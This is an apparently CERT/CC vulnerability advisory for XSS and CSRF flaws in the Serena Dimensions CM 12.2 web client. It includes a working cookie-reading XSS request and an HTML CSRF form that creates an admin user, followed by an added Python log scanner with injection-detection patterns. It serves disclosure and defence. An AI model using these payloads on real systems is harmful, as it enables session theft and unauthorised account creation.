Vulnerability Note VU#823452
Serena Dimensions CM 12.2 Build 7.199.0 web client vulnerabilities
Original Release date: 05 Mar 2014 | Last revised: 05 Mar 2014

Overview
Serena Dimensions CM 12.2 Build 7.199.0 web client and possibly earlier versions contain multiple cross-site scripting vulnerabilities.

Description
Serena Dimensions CM 12.2 Build 7.199.0 web client and possibly earlier versions contain multiple cross-site scripting vulnerabilities.
CWE-79: Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) – CVE-2014-0335

#Unauthenticated vulnerable parameters
/dimensions/ [DB_CONN parameter]
/dimensions/ [DB_NAME parameter]
/dimensions/ [DM_HOST parameter]
/dimensions/ [MAN_DB_NAME parameter]

#Authenticated vulnerable parameters
/dimensions/ [framecmd parameter]
/dimensions/ [identifier parameter]
/dimensions/ [identifier parameter]
/dimensions/ [merant.adm.adapters.AdmDialogPropertyMgr parameter]
/dimensions/ [nav_frame parameter]
/dimensions/ [nav_jsp parameter]
/dimensions/ [target_frame parameter]
/dimensions/ [id parameter]
/dimensions/ [type parameter]

Proof-of-Concept:
GET /dimensions/?jsp=login&USER_ID=sa_dmsys&PASSWORD=D%21m3nsions&SYSTEM_DEFINITIONS=0&FORWARD_TARGET=jsp%25253dlogin&MAN_DB_NAME=2f<%2fscript><script>alert(document.cookie)<%2fscript>207&MAN_DB_CONN=&MAN_DM_HOST=&DM_HOST=TEST1&DB_NAME=TEST2&DB_CONN=TEST3&apiConnDetails=&MENU_SET=Default HTTP/1.1

CWE-352: Cross-Site Request Forgery (CSRF) – CVE-2014-0336

Proof-of-Concept:
<html>

<!-- CSRF PoC -->

<body>

<form action="http://testhost:8080/adminconsole/?jsp=user_new_master&target=merant.adm.dimensions.objects.User&create=yes" method="POST">
<input type="hidden" name="-AdmAttrNames.user_dept" value="" />
<input type="hidden" name="-AdmAttrNames.id" value="HACKTEST1" />
<input type="hidden" name="USER_CURWORKSET" value="%24GENERIC%3a%24GLOBAL" />

<input type="hidden" name="isUserEdit" value="false" />
<input type="hidden" name="-AdmAttrNames.user_site" value="" />
<input type="hidden" name="-AdmAttrNames.user_phone" value="" />
<input type="hidden" name="AUTOMATIC_LOGIN" value="" />
<input type="hidden" name="-AdmAttrNames.user_group_id" value="" />
<input type="hidden" name="null" value="" />
<input type="hidden" name="DIALOG_MODE" value="MODE%5fCREATE" />
<input type="hidden" name="-AdmAttrNames.user_full_name" value="HACKTEST1" />

<input type="hidden" name="projectPicker" value="%24GENERIC%3a%24GLOBAL" />
<input type="hidden" name="wait_until_loaded" value="" />
<input type="hidden" name="projectPickerUid" value="1" />
<input type="hidden" name="GROUPS_ASSIGNED" value="" />
<input type="hidden" name="-AdmAttrNames.email" value="ken1%2ecijsouw%40sincerus%2enl" />

<input type="submit" value="Submit request" />
</form>
</body>
</html>

Impact
A remote unauthenticated attacker may be able to execute arbitrary script in the context of the end-user’s browser session.

Solution
We are currently unaware of a practical solution to this problem.
Restrict access

As a general good security practice, only allow connections from trusted hosts and networks. Note that restricting access does not prevent XSS attacks since the attack comes as an HTTP request from a legitimate user’s host. Restricting access would prevent an attacker from accessing the interface using stolen credentials from a blocked network location.
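Because no vendor fix is listed, a log-side check for exploitation attempts against the parameters and endpoint named in this note is the practical compensating control. The following is an added example (not CERT/CC's or Serena's code); it assumes the web client and admin console are served from http://testhost:8080, that the reverse proxy writes a combined log with a Referer field, and the sample log lines are constructed, the second of which repeats the XSS proof-of-concept query above.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Parameters the note lists as reflected by the /dimensions/ web client.
XSS_PARAMS = {
    "DB_CONN", "DB_NAME", "DM_HOST", "MAN_DB_NAME", "framecmd", "identifier",
    "merant.adm.adapters.AdmDialogPropertyMgr", "nav_frame", "nav_jsp",
    "target_frame", "id", "type",
}
SCRIPT_RE = re.compile(r"<\s*/?\s*script|javascript:|\bon\w+\s*=", re.I)
# Assumption: the Dimensions web client and admin console are served from here.
TRUSTED_ORIGIN = "http://testhost:8080"
# Combined log format with Referer: method, request target, status, size, referer.
LOG_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" \d{3} \S+ "(?P<referer>[^"]*)"')

def decode_fully(value, rounds=3):
    # The PoC nests encodings (%2f, %25253d): decode until the value is stable.
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def inspect(line):
    # Returns (finding, detail) for a suspicious request line, else None.
    m = LOG_RE.search(line)
    if not m:
        return None
    url = urlsplit(m.group("target"))
    if url.path.startswith("/dimensions/"):
        for name, value in parse_qsl(url.query, keep_blank_values=True):
            if name in XSS_PARAMS and SCRIPT_RE.search(decode_fully(value)):
                return ("xss-attempt", name)
    if (m.group("method") == "POST" and url.path.startswith("/adminconsole/")
            and "jsp=user_new_master" in url.query
            and not m.group("referer").startswith(TRUSTED_ORIGIN)):
        return ("csrf-suspect", m.group("referer") or "no-referer")
    return None

def scan(lines):
    return [f for f in map(inspect, lines) if f is not None]

# Constructed sample log lines; the second repeats the note's XSS PoC query string.
LOG_LINES = [
    '10.0.0.5 - - [05/Mar/2014:10:00:00 +0000] "GET /dimensions/?jsp=login&DB_NAME=TEST2&DB_CONN=TEST3 HTTP/1.1" 200 512 "http://testhost:8080/dimensions/"',
    '10.0.0.9 - - [05/Mar/2014:10:00:01 +0000] "GET /dimensions/?jsp=login&MAN_DB_NAME=2f<%2fscript><script>alert(document.cookie)<%2fscript>207&DM_HOST=TEST1 HTTP/1.1" 200 512 "-"',
    '10.0.0.9 - - [05/Mar/2014:10:00:02 +0000] "POST /adminconsole/?jsp=user_new_master&target=merant.adm.dimensions.objects.User&create=yes HTTP/1.1" 302 0 "http://evil.example/csrf.html"',
    '10.0.0.5 - - [05/Mar/2014:10:00:03 +0000] "POST /adminconsole/?jsp=user_new_master&target=merant.adm.dimensions.objects.User&create=yes HTTP/1.1" 302 0 "http://testhost:8080/adminconsole/?jsp=users"',
]
```

Running scan(LOG_LINES) flags the second line as an XSS attempt on MAN_DB_NAME and the third as a user-creation POST with a foreign Referer; a missing Referer on that endpoint is reported too, since the CSRF page above sends none from a same-origin context.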

Vendor Information

Vendor: SERENA Software Inc
Status: Unknown
Date Notified: -
Date Updated: 04 Mar 2014

If you are a vendor and your product is affected, let us know.

CVSS Metrics

Group          Score  Vector
Base           7.1    AV:N/AC:M/Au:N/C:C/I:N/A:N
Temporal       5.4    E:U/RL:U/RC:UC
Environmental  1.5    CDP:L/TD:L/CR:ND/IR:ND/AR:ND

References

http://cwe.mitre.org/data/definitions/79.html
http://cwe.mitre.org/data/definitions/352.html
http://www.serena.com/index.php/en/products/featured-products/dimensions-cm/

Credit

Thanks to Ken Cijsouw for reporting this vulnerability.
This document was written by Michael Orlando.

Other Information

CVE IDs:
CVE-2014-0335
CVE-2014-0336

Date Public:
07 Mar 2014

Date First Published:
05 Mar 2014

Date Last Updated:
05 Mar 2014

Document Revision:
7
